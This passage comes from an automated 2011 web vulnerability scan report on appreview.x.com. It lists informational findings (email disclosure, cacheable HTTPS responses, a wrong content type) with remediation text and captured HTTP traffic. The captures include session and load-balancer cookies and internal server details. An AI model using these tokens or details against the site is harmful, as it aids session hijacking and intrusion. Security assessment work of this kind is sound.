Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000; jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:45 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 650994
JP: D=1358 t=1317142426187235
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

7.3. https://appreview.x.com/resources/scripts/gen/5e8daa65eff08c12130590779b690338.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/gen/5e8daa65eff08c12130590779b690338.js HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://appreview.x.com/index.jspa
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:02 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 648777
JP: D=533 t=1317142383854204
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

7.4. https://appreview.x.com/themes/paypal/js/custom.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /themes/paypal/js/custom.js

Issue detail

The following email address was disclosed in the response:

Request

GET /themes/paypal/js/custom.js HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://appreview.x.com/index.jspa
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:02 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 31770
JP: D=595 t=1317142383863570
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a - preview 2008.12.26
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Usage:

...[SNIP]...

8. Cacheable HTTPS response  previous  next
There are 2 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


8.1. https://appreview.x.com/dwr/interface/Clearvote.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /dwr/interface/Clearvote.js

Request

GET /dwr/interface/Clearvote.js HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://appreview.x.com/index.jspa
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:05 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 22 Sep 2011 23:48:34 GMT
Cache-Control: max-age=60
Content-Type: text/plain
Content-Length: 810
JP: D=591 t=1317142385418734
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (Clearvote == null) var Clearvot
...[SNIP]...

8.2. https://appreview.x.com/themes/paypal/images/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /themes/paypal/images/favicon.ico

Request

GET /themes/paypal/images/favicon.ico HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: jive.recentHistory.-1=31342c323030333b; BIGipServerpool_appreview.x.com_443=410566154.11555.0000; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; JSESSIONID=CE0809056B259EF140626BA1778DDB44.node0

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:41 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 09:46:36 GMT
Etag: "3.0.7-d941befcecba314c9b3d6f0aeeb3fc0c-3638"-gzip
Content-Type: application/octet-stream
Vary: Accept-Encoding,User-Agent
JP: D=1440 t=1317142482086392
Content-Length: 3638
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

...... ..........&...........h.......(... ...@........................................v..r7...Z*..X...p(.J...y...h...K...[...e%..o...b.{B...T...Q..._...S...[!..m..G...T$.x>...\...Y...a...S    ..K...Q
...[SNIP]...

9. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://appreview.x.com
Path:   /dwr/interface/Clearvote.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /dwr/interface/Clearvote.js HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://appreview.x.com/index.jspa
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:05 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 22 Sep 2011 23:48:34 GMT
Cache-Control: max-age=60
Content-Type: text/plain
Content-Length: 810
JP: D=591 t=1317142385418734
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (Clearvote == null) var Clearvot
...[SNIP]...

Report generated by XSS.CX at Tue Sep 27 11:56:33 CDT 2011.